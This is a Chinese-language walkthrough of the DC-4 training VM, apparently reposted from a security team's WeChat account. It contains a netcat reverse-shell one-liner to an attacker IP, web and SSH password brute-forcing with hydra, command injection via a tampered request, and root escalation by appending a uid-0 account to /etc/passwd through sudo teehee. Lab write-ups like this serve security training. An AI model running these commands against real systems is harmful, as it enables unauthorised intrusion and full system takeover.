九种DC靶机渗透测试四(附靶机下载地址)

admin 2023年5月2日04:57:02评论55 views字数 1131阅读3分46秒阅读模式
九种DC靶机渗透测试四(附靶机下载地址)
点击上方蓝字  关注安全知识

九种DC靶机渗透测试四(附靶机下载地址)

1.环境准备

2.局域网扫描

Nmap -sP 192.168.94.0/24

存活主机如下

目标ip 192.168.94.161

九种DC靶机渗透测试四(附靶机下载地址)

3.进行服务探测

九种DC靶机渗透测试四(附靶机下载地址)

发现开启了http服务访问其网站

九种DC靶机渗透测试四(附靶机下载地址)

一个登陆框,用admin登陆未报错

账号为admin

进行密码爆破,br得到happy登录

九种DC靶机渗透测试四(附靶机下载地址)

4.漏洞利用

发现可以命令执行的位置

有可用命令

观察到目录下的其他文件

但是没有任何可以利用的地方,突然想到可不可以改前端代码,来实现命令执行

发现改包提交参数可以实现命令执行

Whoami命令执行成功

九种DC靶机渗透测试四(附靶机下载地址)

九种DC靶机渗透测试四(附靶机下载地址)

想一想可以插入shell进行进行反弹

反弹成功rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.94.130 4444 > /tmp/f;

九种DC靶机渗透测试四(附靶机下载地址)

5.提权

我们先利用python

Python -c “import pty;pty.spawn(‘/bin/bash’)”

九种DC靶机渗透测试四(附靶机下载地址)

就成功进入靶机内啦

但是没有发现其他什么但是找到了一个密码本

猜想可能是爆破:保存密码本到kali用hydra去进行ssh爆破

hydra -L /dc4.user -P /dc4.pass -vV -t 10 -o dc4 192.168.94.161 ssh -s 22

九种DC靶机渗透测试四(附靶机下载地址)

成功ssh连进来

九种DC靶机渗透测试四(附靶机下载地址)

我们在/var/mail目录下发现了passwd(Password is:  ^xHhA&hvim0y

九种DC靶机渗透测试四(附靶机下载地址)

提示说

I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.

Password is: ^xHhA&hvim0y

See ya,

Charles

采用charles账户登陆

九种DC靶机渗透测试四(附靶机下载地址)

成功登陆进来

想想有什么提权的办法

Sudo命令是一个突破口

使用sudo -l 查看

九种DC靶机渗透测试四(附靶机下载地址)

有一个teehee的追加命令想有没有有可能追加到用户

perl -le 'print crypt("123456","aa:)

九种DC靶机渗透测试四(附靶机下载地址)

然后用echo

echo "good:aaAN1ZUwjW7to:0:0:::/bin/bash" | sudo teehee -a /etc/passwd

good用户

不确定密码

Cat一下

九种DC靶机渗透测试四(附靶机下载地址)

九种DC靶机渗透测试四(附靶机下载地址)


发现ok

直接ok to flag.txt welldone

九种DC靶机渗透测试四(附靶机下载地址)

其余7个会持续发文的~

大家记得关注收藏,以免走丢

资源链接:https://pan.baidu.com/s/13ra2u5QjCDRewN_RiTfS_Q 提取码:seri



往期精选



围观

PHP代码审计学习

丨更多

热文

浅谈应急响应

丨更多

·end·

—如果喜欢,快分享给你的朋友们吧—

我们一起愉快的玩耍吧



原文始发于微信公众号(Rot5pider安全团队):九种DC靶机渗透测试四(附靶机下载地址)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年5月2日04:57:02
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   九种DC靶机渗透测试四(附靶机下载地址)http://cn-sec.com/archives/1697732.html

发表评论

匿名网友 填写信息